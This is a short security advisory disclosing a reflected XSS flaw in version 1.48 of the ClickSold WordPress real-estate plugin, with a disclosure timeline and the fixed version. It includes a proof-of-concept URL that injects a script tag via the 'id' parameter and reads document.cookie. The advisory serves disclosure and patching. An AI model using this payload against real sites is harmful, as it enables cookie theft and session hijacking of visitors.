wp-plugin : clicksold-wordpress-plugin

Plugin Details
Plugin Name: wp-plugin : clicksold-wordpress-plugin
Effected Version : 1.48 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
 http://localhost/wp-content/plugins/clicksold-wordpress-plugin/cs_listing_404_page_editor.php?id=id'><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : id

 

Fixed Version : 1.49

 

Type of XSS : Reflected

 

Trac Changelog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=834036%40clicksold-wordpress-plugin&old=820059%40clicksold-wordpress-plugin&sfp_email=&sfph_mail=#file2


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on 2014-01-11
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[| ClickSold adds real estate related features to Agent and Brokerage websites built on WordPress. Features include: * Adding / Displaying real estate listings * Adding Team members / office agents * Customizable real estate widgets * Optional MLS ® Integration * Mobile listing browsing and searching * Search Engine Optimized design **See ClickSold in Action** * Responsive Design: [Eleven40 Theme](http://eleven40demo.clicksold.com/) * Gorgeous IDX Search: [Associate Theme](http://associatedemo.clicksold.com/mls-search/) **How Much?** From FREE to $45/month. **Work with REALTORS®?** Sign up to become a ClickSold Affiliate and earn revenue from every Silver, Gold or Platinum ClickSold plugin you use. * ClickSold Affiliate Program: [Click Here](http://www.clicksold.com/affiliate-program/) * Our Existing Affiliates: [Click Here](http://www.clicksold.com/our-affiliates/) ]